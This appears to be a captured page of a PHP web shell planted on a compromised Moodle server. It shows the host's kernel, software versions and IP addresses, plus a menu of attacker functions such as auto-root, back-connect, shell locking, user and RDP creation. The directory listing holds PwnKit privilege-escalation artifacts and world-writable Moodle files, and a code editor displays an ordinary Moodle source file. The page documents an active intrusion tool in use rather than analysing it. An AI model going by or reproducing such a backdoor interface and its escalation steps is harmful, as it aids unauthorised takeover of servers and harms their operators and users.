Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
phpunit /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
advanced_testcase.php
24.68
KB
-rwxrwxrwx
arraydataset.php
2.76
KB
-rwxrwxrwx
autoloader.php
8.27
KB
-rwxrwxrwx
base_testcase.php
18.83
KB
-rwxrwxrwx
basic_testcase.php
2.63
KB
-rwxrwxrwx
constraint_object_is_equal_wit...
3.75
KB
-rwxrwxrwx
coverage_info.php
3.08
KB
-rwxrwxrwx
database_driver_testcase.php
7.88
KB
-rwxrwxrwx
event_mock.php
2.22
KB
-rwxrwxrwx
event_sink.php
2.28
KB
-rwxrwxrwx
hint_resultprinter.php
5.8
KB
-rwxrwxrwx
message_sink.php
2.24
KB
-rwxrwxrwx
phpmailer_sink.php
2.25
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
restore_date_testcase.php
5.31
KB
-rwxrwxrwx
util.php
33.4
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : event_sink.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Event sink. * * @package core * @category phpunit * @copyright 2013 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ /** * Event redirection sink. * * @package core * @category phpunit * @copyright 2013 Petr Skoda {@link http://skodak.org} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class phpunit_event_sink { /** @var \core\event\base[] array of events */ protected $events = array(); /** * Stop event redirection. * * Use if you do not want event redirected any more. */ public function close() { phpunit_util::stop_event_redirection(); } /** * To be called from phpunit_util only! * * @private * @param \core\event\base $event record from event_read table */ public function add_event(\core\event\base $event) { /* Number events from 0. */ $this->events[] = $event; } /** * Returns all redirected events. * * The instances are records form the event_read table. * The array indexes are numbered from 0 and the order is matching * the creation of events. * * @return \core\event\base[] */ public function get_events() { return $this->events; } /** * Return number of events redirected to this sink. * * @return int */ public function count() { return count($this->events); } /** * Removes all previously stored events. */ public function clear() { $this->events = array(); } }
Close